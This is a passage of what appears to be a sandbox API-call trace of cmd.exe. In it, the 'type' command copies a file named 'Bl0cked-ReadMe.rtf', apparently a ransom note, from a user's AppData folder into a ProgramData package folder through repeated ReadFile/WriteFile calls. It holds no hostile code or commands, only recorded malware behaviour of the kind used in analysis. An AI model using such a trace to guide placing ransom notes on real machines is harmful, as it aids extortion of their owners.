lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.494] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f5d0, lpFilePart=0x12f5cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f5cc*="Desktop") returned 0x18 [0205.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.494] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x250020 [0205.494] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0205.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x250020 [0205.494] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0205.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f34c | out: lpFindFileData=0x12f34c) returned 0x250020 [0205.494] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0205.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0205.494] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0205.494] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0205.495] GetEnvironmentStringsW () returned 0x252b00* [0205.495] FreeEnvironmentStringsW (penv=0x252b00) returned 1 [0205.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.495] GetConsoleOutputCP () returned 0x1b5 [0205.495] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.495] GetUserDefaultLCID () returned 0x409 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f710, cchData=128 | out: lpLCData="0") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f710, cchData=128 | out: lpLCData="0") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f710, cchData=128 | out: lpLCData="1") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0205.496] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0205.496] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.497] GetConsoleTitleW (in: lpConsoleTitle=0x2408e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.497] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.497] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0205.497] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0205.497] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0205.498] _wcsicmp (_String1="type", _String2=")") returned 75 [0205.498] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0205.498] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0205.498] _wcsicmp (_String1="IF", _String2="type") returned -11 [0205.498] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0205.498] _wcsicmp (_String1="REM", _String2="type") returned -2 [0205.498] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0205.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.502] GetFileType (hFile=0x7) returned 0x2 [0205.502] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0205.502] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12f608 | out: lpMode=0x12f608) returned 1 [0205.502] _dup (_FileHandle=1) returned 3 [0205.503] _close (_FileHandle=1) returned 0 [0205.503] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0205.503] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\packag~1\\{e6e75~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x12f5d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0205.504] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0205.504] GetConsoleTitleW (in: lpConsoleTitle=0x12f408, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.504] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0205.504] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0205.505] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0205.505] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0205.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.505] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x12ef6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ef6c) returned 0x240e80 [0205.506] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0205.506] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0205.506] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0205.506] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12de78, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0205.506] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0205.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.506] GetFileType (hFile=0x54) returned 0x1 [0205.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.506] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x12ded0 | out: lpFileSizeHigh=0x12ded0*=0x0) returned 0x1632 [0205.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.506] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.506] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.506] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.506] GetFileType (hFile=0x4c) returned 0x1 [0205.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.506] GetFileType (hFile=0x4c) returned 0x1 [0205.506] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.506] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.508] GetFileType (hFile=0x4c) returned 0x1 [0205.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.508] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.508] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] GetFileType (hFile=0x4c) returned 0x1 [0205.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.563] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.563] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.564] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.564] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] GetFileType (hFile=0x4c) returned 0x1 [0205.564] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.564] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.565] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.565] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] GetFileType (hFile=0x4c) returned 0x1 [0205.565] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.565] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.566] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.566] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.566] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.566] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.567] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.567] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] GetFileType (hFile=0x4c) returned 0x1 [0205.567] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.567] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.568] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.568] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] GetFileType (hFile=0x4c) returned 0x1 [0205.568] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.568] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: 